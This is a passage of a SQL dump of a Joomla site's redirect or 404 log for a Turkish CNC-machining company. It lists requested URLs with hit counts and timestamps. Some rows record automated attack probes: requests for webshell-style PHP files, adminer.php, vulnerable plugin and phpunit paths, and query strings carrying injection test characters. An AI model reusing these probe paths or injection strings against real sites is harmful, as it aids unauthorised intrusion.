00:00:00',301),(24146,'https://3s-technologies.com.tr/en/akrilik-işleme-acrylic-processing',NULL,'','',1283,0,'2020-02-12 22:11:02','0000-00-00 00:00:00',301),(24147,'https://3s-technologies.com.tr/en/aluminyum-işleme-aluminum-processing',NULL,'','',1308,0,'2020-02-13 05:22:30','0000-00-00 00:00:00',301),(24148,'https://www.3s-technologies.com.tr/en/akrilik-işleme-acrylic-processing',NULL,'','',165,0,'2020-02-13 13:55:22','0000-00-00 00:00:00',301),(24149,'http://www.3s-technologies.com.tr/en/wood-processing-ahşap-işleme',NULL,'','',537,0,'2020-02-13 16:07:25','0000-00-00 00:00:00',301),(24150,'http://www.3s-technologies.com.tr/en/aluminyum-işleme-aluminum-processing',NULL,'','',428,0,'2020-02-13 19:31:14','0000-00-00 00:00:00',301),(24151,'https://3s-technologies.com.tr/en/wood-processing-ahşap-işleme',NULL,'','',1395,0,'2020-02-14 03:02:54','0000-00-00 00:00:00',301),(24152,'http://www.3s-technologies.com.tr/tr/wp-content/_input_3_raiz0.php',NULL,'','',3,0,'2020-02-14 16:13:27','0000-00-00 00:00:00',301),(24153,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/revslider/temp/update_extract/raiz0__agwnz.php',NULL,'','',1,0,'2020-02-14 16:13:29','0000-00-00 00:00:00',301),(24154,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/showbiz/temp/update_extract/raiz0__agwnz.php',NULL,'','',1,0,'2020-02-14 16:13:31','0000-00-00 00:00:00',301),(24155,'http://www.3s-technologies.com.tr/tr/components/raiz0worm_1581693436.php',NULL,'','',1,0,'2020-02-14 16:13:41','0000-00-00 00:00:00',301),(24156,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/assignments/raiz0_1581693436.php.',NULL,'','',1,0,'2020-02-14 16:13:43','0000-00-00 00:00:00',301),(24157,'https://www.3s-technologies.com.tr/en/aluminyum-işleme-aluminum-processing',NULL,'','',145,0,'2020-02-14 18:33:11','0000-00-00 00:00:00',301),(24158,'https://3s-technologies.com.tr/tr/ads.txt',NULL,'','',5269,0,'2020-02-14 22:23:54','0000-00-00 00:00:00',301),(24159,'https://www.3s-technologies.com.tr/tr/ads.txt',NULL,'','',2232,0,'2020-02-14 22:23:57','0000-00-00 00:00:00',301),(24160,'http://www.3s-technologies.com.tr/tr/ads.txt',NULL,'','',2241,0,'2020-02-14 22:23:59','0000-00-00 00:00:00',301),(24161,'http://3s-technologies.com.tr/en/wood-processing-ahşap-işleme',NULL,'','',309,0,'2020-02-15 03:02:28','0000-00-00 00:00:00',301),(24162,'http://3s-technologies.com.tr/en/aluminyum-işleme-aluminum-processing',NULL,'','',337,0,'2020-02-15 05:36:21','0000-00-00 00:00:00',301),(24163,'http://3s-technologies.com.tr/tr//index.php/component/users/?view=registration',NULL,'','',2,0,'2020-02-15 11:17:46','0000-00-00 00:00:00',301),(24164,'http://www.3s-technologies.com.tr/tr/&nx=173&ny=67&clkt=17&bg=!o6clolhykup5eabkaiwcaaaa4viaaaa3mqgm_dcgvody8kjf4pimc_k4-1aazx_jnlbitt8iihreqxwwkgv1-8qsuocuhqvjezf4vvyfplhrrbbu4ajkucbvhbcbxb7huhfrbf-gmnpcplnqsprjc7cvskyirbnpgxfwqelgs11lxzoacdj7jp5itqcaebjzhi9velcmzoivjwmcepgqbzsp1kcsmduiuua9fbmt4twfwd9lhulaf1sd2cidvxcithq7zuhuo-skccuwl-m54_ypu9qsr6dw5wvxpbwzcjtzxnnhnqkage52zmrx_z215f4bb4cnxrtztvmad0sfvpdnsnctb7s2uehs7gnc_ryx6kccdwwpvffp1okhykg8a2jc2tilxvzuwjp4s-5acmjk6sewebrowm8uawbpudl2emxgcvlkww76o9tadruszjqj8_7wju_q0euez2tf-8xzxwuovcck-rzccupbi7fotqhzhdvpdzbsxlbwj39c6mydkk--rgowawutowxchte0at8lymux7bgpp80qz8fkbb1djnyruw6bhqnhl9wshqyiyuxvytszywxaoedhvs4',NULL,'https://www.google.com/','',1,0,'2020-02-15 16:40:17','0000-00-00 00:00:00',301),(24165,'http://www.3s-technologies.com.tr/tr/wpfojzuqu.html',NULL,'','',1,0,'2020-02-16 03:20:17','0000-00-00 00:00:00',301),(24166,'http://3s-technologies.com.tr/tr/archive',NULL,'http://3s-technologies.com.tr/','',2,0,'2020-02-16 05:21:37','0000-00-00 00:00:00',301),(24167,'http://3s-technologies.com.tr/tr/wpress',NULL,'http://3s-technologies.com.tr/','',1,0,'2020-02-16 08:56:01','0000-00-00 00:00:00',301),(24168,'http://www.3s-technologies.com.tr/tr/components/com_jce/editor/libraries/css/colorpicker.css',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_jce&view=editor&layout=plugin&plugin=colorpicker&368e633aab78a6dac1570d0346af1a9f=1&component_id=10000','',5,0,'2020-02-16 14:31:44','0000-00-00 00:00:00',301),(24169,'https://mail.3s-technologies.com.tr/en/aluminyum-işleme-aluminum-processing',NULL,'','',5,0,'2020-02-17 01:56:37','0000-00-00 00:00:00',301),(24170,'http://3s-technologies.com.tr/tr/wp-content/plugins/themegrill-demo-importer/assets/js/admin/demo-importer.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/themegrill-demo-importer/assets/js/admin/demo-importer.js','',1,0,'2020-02-17 05:38:37','0000-00-00 00:00:00',301),(24171,'https://mail.3s-technologies.com.tr/en/akrilik-işleme-acrylic-processing',NULL,'','',5,0,'2020-02-17 07:16:09','0000-00-00 00:00:00',301),(24172,'http://3s-technologies.com.tr/en/akrilik-işleme-acrylic-processing',NULL,'','',329,0,'2020-02-17 08:29:06','0000-00-00 00:00:00',301),(24173,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/am100.jpg',NULL,'','',14,0,'2020-02-17 13:06:57','0000-00-00 00:00:00',301),(24174,'http://3s-technologies.com.tr/tr/public_html',NULL,'http://3s-technologies.com.tr/','',12,0,'2020-02-17 14:26:38','0000-00-00 00:00:00',301),(24175,'http://www.3s-technologies.com.tr/en/akrilik-işleme-acrylic-processing',NULL,'','',393,0,'2020-02-17 16:26:55','0000-00-00 00:00:00',301),(24176,'https://mail.3s-technologies.com.tr/en/wood-processing-ahşap-işleme',NULL,'','',5,0,'2020-02-17 17:10:19','0000-00-00 00:00:00',301),(24177,'http://3s-technologies.com.tr/avtogear_ru_cron_k.php',NULL,'','',3,0,'2020-02-17 22:12:19','0000-00-00 00:00:00',301),(24178,'http://3s-technologies.com.tr/tr/oldsite',NULL,'http://3s-technologies.com.tr/','',36,0,'2020-02-19 05:22:37','0000-00-00 00:00:00',301),(24179,'https://mail.proneo-led.com/3s-technologies.com.tr/joomla/en/akrilik-işleme-acrylic-processing',NULL,'','',4,0,'2020-02-19 13:23:38','0000-00-00 00:00:00',301),(24180,'https://mail.proneo-led.com/3s-technologies.com.tr/joomla/en/aluminyum-işleme-aluminum-processing',NULL,'','',3,0,'2020-02-19 20:06:04','0000-00-00 00:00:00',301),(24181,'https://mail.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/am100.jpg',NULL,'','',2,0,'2020-02-20 04:45:49','0000-00-00 00:00:00',301),(24182,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/am100.jpg',NULL,'https://www.google.com/','',5,0,'2020-02-20 07:34:24','0000-00-00 00:00:00',301),(24183,'https://mail.proneo-led.com/3s-technologies.com.tr/joomla/en/wood-processing-ahşap-işleme',NULL,'','',4,0,'2020-02-20 08:48:21','0000-00-00 00:00:00',301),(24184,'http://3s-technologies.com.tr/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-login.php','',3,0,'2020-02-20 10:30:39','0000-00-00 00:00:00',301),(24185,'http://www.3s-technologies.com.tr/tr/&nx=75&ny=18&clkt=17&bg=!vr2lvavyfv3kjhdrryicaaabmliaaabqmqgrdovmmvpyfrt7-6qkjgmnovx_cdtsj3quq8526kuykxbzojziy3olqsmutyfx05ehczhs_1bczyuze0yrzn67nijwpvvmpxjvky-o2sm60bxqnc30n0gyicapa2iifmpofxqqtsu8_qpimq-w_ggxxrflzv0lj7rifridblxpxz79uvbwoh33e_oi6b-gv0dwsjlpgyledn97gownrpkq444ggjtwnehmruczis80cjbhxwt02it3soky1nvtca8ppumbvew0wgysgf2ss1eivdepxj9eqdj0eiyinhxlvdwg_iipdi3o6zh0zpy0jyjwnrkca-t8fmf-ut4l5xef03y8n6ennujqbpzcrcma0uuz8nj0uqdgazmreaokugicekhkn2fnfnqjplgxymetol4__a5youj849oprwviuvc7cxjiaxmvqedsss_v6bqntmjcjhrhhfb2hluuu7czwdux5wp4l9wslvomq6pqvcnr6cxhkr7erjv1cela0w8kewx7zrkd0maf-h_btcu39lr6nuateyl8b228d4xbisyuj4uvpshg6yze4g',NULL,'https://www.google.com/','',1,0,'2020-02-20 13:03:26','0000-00-00 00:00:00',301),(24186,'http://www.3s-technologies.com.tr/en/images/stories/virtuemart/product/am100.jpg',NULL,'','',11,0,'2020-02-21 17:50:19','0000-00-00 00:00:00',301),(24187,'https://mail.3s-technologies.com.tr/tr/images/stories/virtuemart/product/am100.jpg',NULL,'','',2,0,'2020-02-22 07:32:41','0000-00-00 00:00:00',301),(24188,'http://www.3s-technologies.com.tr/tr/ujociajiwaf.html',NULL,'','',1,0,'2020-02-22 11:37:46','0000-00-00 00:00:00',301),(24189,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/akrilik-işleme-acrylic-processing',NULL,'','',47,0,'2020-02-22 20:07:23','0000-00-00 00:00:00',301),(24190,'http://3s-technologies.com.tr/tr/admin/',NULL,'','',1,0,'2020-02-22 22:38:43','0000-00-00 00:00:00',301),(24191,'http://3s-technologies.com.tr/tr/manager/',NULL,'','',1,0,'2020-02-22 22:38:46','0000-00-00 00:00:00',301),(24192,'http://3s-technologies.com.tr/tr/admin/content/sitetree/',NULL,'','',1,0,'2020-02-22 22:38:49','0000-00-00 00:00:00',301),(24193,'http://3s-technologies.com.tr/tr/simpla/',NULL,'','',1,0,'2020-02-22 22:38:51','0000-00-00 00:00:00',301),(24194,'http://mail.3s-technologies.com.tr/tr/images/stories/virtuemart/product/am100.jpg',NULL,'','',2,0,'2020-02-22 22:41:24','0000-00-00 00:00:00',301),(24195,'http://3s-technologies.com.tr/tr/kwvbtgahzghqkzx.html',NULL,'','',1,0,'2020-02-23 06:31:05','0000-00-00 00:00:00',301),(24196,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/wood-processing-ahşap-işleme',NULL,'','',72,0,'2020-02-23 18:27:05','0000-00-00 00:00:00',301),(24197,'http://mail.3s-technologies.com.tr/en/aluminyum-işleme-aluminum-processing',NULL,'','',2,0,'2020-02-23 23:16:04','0000-00-00 00:00:00',301),(24198,'http://www.3s-technologies.com.tr/tr/templates/beez5/images/vm-preloader.gif',NULL,'http://www.3s-technologies.com.tr/templates/beez5/css/vmsite-ltr.css?vmver=d7768473','',28,0,'2020-02-24 10:23:01','0000-00-00 00:00:00',301),(24199,'https://www.3s-technologies.com.tr/en/wood-processing-ahşap-işleme',NULL,'','',139,0,'2020-02-24 21:16:03','0000-00-00 00:00:00',301),(24200,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/?option=com_content\'lnuxrx<\'\">aeqmet&view=article&id=48:mx400&catid=36:orta-hizli&itemid=69',NULL,'http://proneo-led.com:80/3s-technologies.com.tr/joomla/index.php','',1,0,'2020-02-25 03:34:48','0000-00-00 00:00:00',301),(24201,'http://mail.3s-technologies.com.tr/en/akrilik-işleme-acrylic-processing',NULL,'','',2,0,'2020-02-25 06:02:27','0000-00-00 00:00:00',301),(24202,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/aluminyum-işleme-aluminum-processing',NULL,'','',52,0,'2020-02-25 13:19:01','0000-00-00 00:00:00',301),(24203,'http://3s-technologies.com.tr/tr/blog/license.txt',NULL,'http://3s-technologies.com.tr/blog/license.txt','',2,0,'2020-02-26 07:18:38','0000-00-00 00:00:00',301),(24204,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/?option=com_content\'bgodvx<\'\">bhiika&view=article&id=48:mx400&catid=36:orta-hizli&itemid=69',NULL,'http://proneo-led.com:80/3s-technologies.com.tr/joomla/index.php','',1,0,'2020-02-26 12:54:35','0000-00-00 00:00:00',301),(24205,'http://3s-technologies.com.tr/en/component/user?task=register',NULL,'','',1,0,'2020-02-26 14:47:07','0000-00-00 00:00:00',301),(24206,'http://www.3s-technologies.com.tr/tr/&nx=302&ny=3&clkt=23&bg=!pd-lpydyqjtzrnpflhgcaaabafiaaabsmqfztd0lx6bltnj6koh1pvzaioxkmios2z-olnrp97_jo63vqa_ou8ttl3rn108bz8oqb5hcrjfjnir0fag5-ytsv9r4ugl8wprlldl-le4odrirrgqxaemhmbwavaadwbzgzs2wctvtkfjtg6cfe6zkf8znu9qnzaoui9maxe5szitvzdd8arvtnsw9nvzzkhw8m_vh0g5khbmi6b3rinv_swrcpkd1inea49u46tz6mtfdmeu30gj3lbwdimnuce0qyokgdh2xr4kdzpyzmtfjsdkv9avdwjeo2rcll9ul4pwyxrgk_wk0iyny5tsy2ebiam7n1iatgrw08azcwx7tha-ctr9l7mmx1bzb8hlzxujse_yjb3g25cmnxbgoevlgfsdavqaecgt030dgg9av_jkno2wsujksvq2cnvg8p6q7qkdadwxpzww5zoax7nsyny9l_kbbjruhlejynuktykenyi8-hoh9cmd_miz1oizjagc',NULL,'https://www.google.com/','',1,0,'2020-02-26 17:05:18','0000-00-00 00:00:00',301),(24207,'http://3s-technologies.com.tr/tr/wp/license.txt',NULL,'http://3s-technologies.com.tr/wp/license.txt','',1,0,'2020-02-26 23:36:32','0000-00-00 00:00:00',301),(24208,'http://mail.3s-technologies.com.tr/tr/adminer.php',NULL,'','',7,0,'2020-02-27 11:06:47','0000-00-00 00:00:00',301),(24209,'http://www.3s-technologies.com.tr/tr/adminer.php',NULL,'','',4,0,'2020-02-27 12:53:51','0000-00-00 00:00:00',301),(24210,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/am100.jpg',NULL,'','',16,0,'2020-02-27 23:01:19','0000-00-00 00:00:00',301),(24211,'http://3s-technologies.com.tr/tr/info/license.txt',NULL,'http://3s-technologies.com.tr/info/license.txt','',2,0,'2020-02-28 09:38:35','0000-00-00 00:00:00',301),(24212,'http://www.3s-technologies.com.tr/tr/becklrwky.html',NULL,'','',1,0,'2020-02-28 13:46:44','0000-00-00 00:00:00',301),(24213,'http://mail.proneo-led.com/3s-technologies.com.tr/joomla/en/akrilik-işleme-acrylic-processing',NULL,'','',2,0,'2020-02-29 21:26:05','0000-00-00 00:00:00',301),(24214,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/am100.jpg',NULL,'','',8,0,'2020-03-01 03:11:45','0000-00-00 00:00:00',301),(24215,'http://mail.proneo-led.com/3s-technologies.com.tr/joomla/en/wood-processing-ahşap-işleme',NULL,'','',2,0,'2020-03-01 03:28:14','0000-00-00 00:00:00',301),(24216,'http://mail.3s-technologies.com.tr/en/wood-processing-ahşap-işleme',NULL,'','',2,0,'2020-03-01 05:43:30','0000-00-00 00:00:00',301),(24217,'http://mail.proneo-led.com/3s-technologies.com.tr/joomla/en/aluminyum-işleme-aluminum-processing',NULL,'','',2,0,'2020-03-01 10:27:23','0000-00-00 00:00:00',301),(24218,'http://3s-technologies.com.tr/tr/wp-links-opml.php',NULL,'http://www.google.com/','',58,0,'2020-03-01 13:34:09','0000-00-00 00:00:00',301),(24219,'http://mail.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping',NULL,'','',2,0,'2020-03-01 17:17:45','0000-00-00 00:00:00',301),(24220,'http://3s-technologies.com.tr/en/wp-content/plugins/photo-gallery/filemanager/uploadhandler.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','',1,0,'2020-03-02 20:09:32','0000-00-00 00:00:00',301),(24221,'http://3s-technologies.com.tr/tr/test/license.txt',NULL,'http://3s-technologies.com.tr/test/license.txt','',2,0,'2020-03-02 23:01:48','0000-00-00 00:00:00',301),(24222,'http://www.3s-technologies.com.tr/tr/&nx=179&ny=16&clkt=32&bg=!4ekl4vpy4xqqoha4gfgcaaabhviaaacrmqfxljzlx78mkc1ywzurog-ipm-rglgvrbtdadqz-5fui7u5andwumi2atpgwsdulte1ciyl6ygf7aw5xdsg9zmmee7uq4k7dmcgqc0tics1z9ekhrgxesqp-6lc6kumej0swfxmkzf05ctkjcrdlsc1saeddakostryynpvmu6crycjgbyzdkkkypyklsgauhqzqkx0oex2aucd6nfvv0v4_hywdizq0_t4eqbp1qvetto2i_7ewbptr5kuty-o-0ylxfn8y9v8rp5ors1ktu5vmofma8nhwwvyb1tjcwms65anzazdvovq9roocycn-earpx87ktaggfzrojmznadbpaz3zygs8fyh6nykzwrqflpj-ap5r82pofybei9se2ulms-l8wxx-tee5qrqwr3tehohjd5jzkryvxwugqhjr98r5ha43byqezrcw6fl1mz-osv7oumkpxtdhbnjl0wytjav7bma-95fxyt9ihbjggsy',NULL,'https://www.google.com/','',1,0,'2020-03-03 01:28:17','0000-00-00 00:00:00',301),(24223,'http://www.3s-technologies.com.tr/en/images/global/lfs',NULL,'','',1,0,'2020-03-03 22:52:47','0000-00-00 00:00:00',301),(24224,'http://www.3s-technologies.com.tr/en/asset-manifest.json',NULL,'http://www.3s-technologies.com.tr/en/','',5,0,'2020-03-04 06:03:55','0000-00-00 00:00:00',301),(24225,'http://3s-technologies.com.tr/en/wp-register.php',NULL,'','',3,0,'2020-03-04 08:12:40','0000-00-00 00:00:00',301),(24226,'http://www.3s-technologies.com.tr/tr/.jpg',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/cnc/3s-cnc-01-1500x1500-detail?tmpl=component','',51,0,'2020-03-04 10:11:00','0000-00-00 00:00:00',301),(24227,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/am100_300x300.jpg',NULL,'','',3,0,'2020-03-05 01:27:25','0000-00-00 00:00:00',301),(24228,'http://3s-technologies.com.tr/tr/wp-admin/css/ie.css',NULL,'http://www.google.com/','',8,0,'2020-03-05 04:43:56','0000-00-00 00:00:00',301),(24229,'http://3s-technologies.com.tr/tr/components/com_initializer/build.php',NULL,'','',1,0,'2020-03-05 05:35:28','0000-00-00 00:00:00',301),(24230,'http://3s-technologies.com.tr/tr/bitrix/admin',NULL,'http://3s-technologies.com.tr/bitrix/admin/','',1,0,'2020-03-06 13:15:15','0000-00-00 00:00:00',301),(24231,'http://www.3s-technologies.com.tr/tr/pmaaqlcogsnm.html',NULL,'','',1,0,'2020-03-06 17:01:41','0000-00-00 00:00:00',301),(24232,'http://3s-technologies.com.tr/tr/sgvgzwjqth.html',NULL,'','',1,0,'2020-03-07 08:50:10','0000-00-00 00:00:00',301),(24233,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',1,0,'2020-03-07 11:48:27','0000-00-00 00:00:00',301),(24234,'http://www.3s-technologies.com.tr/tr/license.txt',NULL,'http://www.3s-technologies.com.tr/license.txt','',9,0,'2020-03-07 18:53:55','0000-00-00 00:00:00',301),(24235,'http://3s-technologies.com.tr/tr/shop/license.txt',NULL,'http://3s-technologies.com.tr/shop/license.txt','',1,0,'2020-03-08 15:46:30','0000-00-00 00:00:00',301),(24236,'http://www.3s-technologies.com.tr/en/images/stories/virtuemart/product/resized/am100_300x300.jpg',NULL,'','',1,0,'2020-03-08 19:20:06','0000-00-00 00:00:00',301),(24237,'http://www.3s-technologies.com.tr/en/aluminyum-işleme-aluminum-processing/',NULL,'','',13,0,'2020-03-08 20:44:29','0000-00-00 00:00:00',301),(24238,'http://www.3s-technologies.com.tr/en/akrilik-işleme-acrylic-processing/',NULL,'','',13,0,'2020-03-08 20:44:31','0000-00-00 00:00:00',301),(24239,'http://www.3s-technologies.com.tr/en/wood-processing-ahşap-işleme/',NULL,'','',13,0,'2020-03-08 20:44:33','0000-00-00 00:00:00',301),(24240,'http://www.3s-technologies.com.tr/en/dmb-elektronik.com/j3.2',NULL,'http://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2','',1,0,'2020-03-08 21:36:39','0000-00-00 00:00:00',301),(24241,'http://3s-technologies.com.tr/tr/1/license.txt',NULL,'http://3s-technologies.com.tr/1/license.txt','',4,0,'2020-03-09 12:06:42','0000-00-00 00:00:00',301),(24242,'http://3s-technologies.com.tr/tr/dev/license.txt',NULL,'http://3s-technologies.com.tr/dev/license.txt','',4,0,'2020-03-10 01:28:10','0000-00-00 00:00:00',301),(24243,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/languages/jquery.validationengine-en.js?vmver=d7768473',NULL,'','',1,0,'2020-03-10 15:05:02','0000-00-00 00:00:00',301),(24244,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/jquery.validationengine.js?vmver=d7768473',NULL,'','',2,0,'2020-03-10 15:10:38','0000-00-00 00:00:00',301),(24245,'https://3s-technologies.com.tr/tr/wordpress/license.txt',NULL,'https://3s-technologies.com.tr/wordpress/license.txt','',1,0,'2020-03-12 02:19:02','0000-00-00 00:00:00',301),(24246,'http://3s-technologies.com.tr/tr/wordpress/license.txt',NULL,'http://3s-technologies.com.tr/wordpress/license.txt','',4,0,'2020-03-12 15:23:22','0000-00-00 00:00:00',301),(24247,'http://3s-technologies.com.tr/tr/old/license.txt',NULL,'http://3s-technologies.com.tr/old/license.txt','',4,0,'2020-03-12 22:34:42','0000-00-00 00:00:00',301),(24248,'http://www.3s-technologies.com.tr/tr/zbjlxcdtgmslwsha.html',NULL,'','',1,0,'2020-03-13 03:34:01','0000-00-00 00:00:00',301),(24249,'http://3s-technologies.com.tr/tr/new/license.txt',NULL,'http://3s-technologies.com.tr/new/license.txt','',3,0,'2020-03-13 10:05:17','0000-00-00 00:00:00',301),(24250,'http://3s-technologies.com.tr/tr/w/license.txt',NULL,'http://3s-technologies.com.tr/w/license.txt','',2,0,'2020-03-14 08:40:56','0000-00-00 00:00:00',301),(24251,'http://3s-technologies.com.tr/tr/2/license.txt',NULL,'http://3s-technologies.com.tr/2/license.txt','',2,0,'2020-03-14 14:20:35','0000-00-00 00:00:00',301),(24252,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,6-55',NULL,'','',4,0,'2020-03-14 18:12:33','0000-00-00 00:00:00',301),(24253,'http://3s-technologies.com.tr/tr/tmp/license.txt',NULL,'http://3s-technologies.com.tr/tmp/license.txt','',2,0,'2020-03-14 19:58:48','0000-00-00 00:00:00',301),(24254,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/results,6-55',NULL,'','',2,0,'2020-03-14 20:21:20','0000-00-00 00:00:00',301),(24255,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,category_name/results,6-55',NULL,'','',1,0,'2020-03-16 16:41:32','0000-00-00 00:00:00',301),(24256,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/?option=com_content\'dirwin<\'\">tyhejr&view=article&id=48:mx400&catid=36:orta-hizli&itemid=69',NULL,'http://proneo-led.com:80/3s-technologies.com.tr/joomla/index.php','',1,0,'2020-03-18 19:14:14','0000-00-00 00:00:00',301),(24257,'http://www.3s-technologies.com.tr/tr/ivczfazdzlchol.html',NULL,'','',1,0,'2020-03-20 04:40:43','0000-00-00 00:00:00',301),(24258,'http://3s-technologies.com.tr/tr/pjgyhiec.html',NULL,'','',1,0,'2020-03-21 09:03:57','0000-00-00 00:00:00',301),(24259,'http://3s-technologies.com.tr/wp-console.php',NULL,'','',2,0,'2020-03-21 19:25:07','0000-00-00 00:00:00',301),(24260,'http://3s-technologies.com.tr/tr/site/license.txt',NULL,'http://3s-technologies.com.tr/site/license.txt','',2,0,'2020-03-25 09:21:33','0000-00-00 00:00:00',301),(24261,'http://3s-technologies.com.tr/tr/temp/license.txt',NULL,'http://3s-technologies.com.tr/temp/license.txt','',2,0,'2020-03-25 16:22:04','0000-00-00 00:00:00',301),(24262,'http://3s-technologies.com.tr/tr/web/license.txt',NULL,'http://3s-technologies.com.tr/web/license.txt','',1,0,'2020-03-25 22:19:03','0000-00-00 00:00:00',301),(24263,'http://3s-technologies.com.tr/tr/www/license.txt',NULL,'http://3s-technologies.com.tr/www/license.txt','',2,0,'2020-03-26 04:33:50','0000-00-00 00:00:00',301),(24264,'http://www.3s-technologies.com.tr/tr/iosbsfagbkg.html',NULL,'','',1,0,'2020-03-26 12:11:47','0000-00-00 00:00:00',301),(24265,'http://3s-technologies.com.tr/tr/reserv/license.txt',NULL,'http://3s-technologies.com.tr/reserv/license.txt','',1,0,'2020-03-26 17:34:24','0000-00-00 00:00:00',301),(24266,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/template/testcasemethod.tpl.dist',NULL,'http://3s-technologies.com.tr/vendor/phpunit/phpunit/src/Util/PHP/Template/TestCaseMethod.tpl.dist','',1,0,'2020-03-27 05:01:41','0000-00-00 00:00:00',301),(24267,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/images/urunler/t_mi300.jpg',NULL,'','',1,0,'2020-03-27 12:36:41','0000-00-00 00:00:00',301),(24268,'http://www.3s-technologies.com.tr/tr/&nx=200&ny=18&clkt=33&bg=!k5clkihypct88y9f9becaaabhfiaaabzmqf5kog5xtnfjmtgb94xzhya3agxformethujvlrqyz1kx9qrmj8ype3ubmpaf21rcwoktg_sxnntapq4evygbt4jmb3xhkj6j7ggnlwbymbzfnc_f6mtjgq_ijsmrwwiniwxfaiobbtyrnnf0ozvno643jtil_kzwgjsuocmpnecgpvgkwpj-arillaht61u2hmta-ztu7hwm0ccifwmsnvfrxd0-2rs0av6qqql044qnjnrzubhokbckb13ggjaiwnewagexkdh1dzsjkuo8rgn8-py7yxbplfzylymoloywq1gbp7w6boa-gnsm5woofevhizjzyzk7u27k6x-4l-ugpcjiv8t38dbcmuixdj-wcvhw_i262dw-bnph1jdaw4kxqwctxopbkzjt9kyiqrtbkgp8s8x-oscm8nlrest9wjbw58w4rhegtvom4rm0lzbayj6gkl7o_z2fsi-z73aj_pxqeglv1xrrhueqduup-tj4eo9xaocwa',NULL,'https://www.google.com/','',1,0,'2020-03-27 12:42:50','0000-00-00 00:00:00',301),(24269,'https://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/template/testcasemethod.tpl.dist',NULL,'https://3s-technologies.com.tr/vendor/phpunit/phpunit/src/Util/PHP/Template/TestCaseMethod.tpl.dist','',1,0,'2020-03-27 16:57:50','0000-00-00 00:00:00',301),(24270,'http://www.3s-technologies.com.tr/tr/&nx=234&ny=29&clkt=25&bg=!5uwl5f1ynhpeyplqgnkcaaaa-fiaaabkmqf53bnbnve04y5itdzjgyobmrotvdiibegmefn4pgk2qxudfcmkccgmhzp6d7y2alq-dshaokc0sgtxegcz9mnhsf8dhub6utdsaezlomzbk0pnc_-ijhdo_nsuc9wdlc9kornrzx6fqhm4vdakna9yji2-w2s1ybtei-ros2kwd8oltuesxmo1dbqi5by_kqzzqdjrqbkco-w1j_npuomujylq0skqkf3ss_hbpjowvdqxmaxrcc8xg7l580tfegfu51xu8t4gvdxrpjd8wwsnu5jewglrvy6s0ctklmyxfr51jv1blp0b8qujekggo46m8ebefngvbiik77oymqeergjzjv1udkakrzssobkcatmmhut6b6gsbeb5vjvbx4yzbcqcmodluujf8xkcx8fgrxycdwuqdvnrtneqht6pkw0e_z9pb_wl3fae8ts9bzddtbrwe1nstq48j6idcwzn28aveff7sfaz8xsbyudokckhocxvijuht1c',NULL,'https://www.google.com/','',1,0,'2020-03-27 20:25:25','0000-00-00 00:00:00',301),(24271,'http://3s-technologies.com.tr/tr/images/modric.gif',NULL,'','',2,0,'2020-03-28 01:33:57','0000-00-00 00:00:00',301),(24272,'http://3s-technologies.com.tr/tr/arx/license.txt',NULL,'http://3s-technologies.com.tr/arx/license.txt','',1,0,'2020-03-28 07:00:28','0000-00-00 00:00:00',301),(24273,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/videolar',NULL,'','',8,0,'2020-03-28 07:04:16','0000-00-00 00:00:00',301),(24274,'http://3s-technologies.com.tr/tr/res/license.txt',NULL,'http://3s-technologies.com.tr/res/license.txt','',1,0,'2020-03-28 13:18:39','0000-00-00 00:00:00',301),(24275,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_sku/results,6-55',NULL,'','',3,0,'2020-03-28 16:04:00','0000-00-00 00:00:00',301),(24276,'http://3s-technologies.com.tr/en/aluminyum-işleme-aluminum-processing/',NULL,'','',7,0,'2020-03-29 00:00:08','0000-00-00 00:00:00',301),(24277,'http://3s-technologies.com.tr/en/akrilik-işleme-acrylic-processing/',NULL,'','',7,0,'2020-03-29 00:00:12','0000-00-00 00:00:00',301),(24278,'http://3s-technologies.com.tr/en/wood-processing-ahşap-işleme/',NULL,'','',6,0,'2020-03-29 00:00:19','0000-00-00 00:00:00',301),(24279,'http://3s-technologies.com.tr/tr/back/license.txt',NULL,'http://3s-technologies.com.tr/back/license.txt','',1,0,'2020-03-29 01:24:47','0000-00-00 00:00:00',301),(24280,'http://3s-technologies.com.tr/tr/_wp/license.txt',NULL,'http://3s-technologies.com.tr/_wp/license.txt','',1,0,'2020-03-29 07:46:04','0000-00-00 00:00:00',301),(24281,'http://www.3s-technologies.com.tr/tr/assets',NULL,'http://www.3s-technologies.com.tr/assets/','',1,0,'2020-03-29 08:25:58','0000-00-00 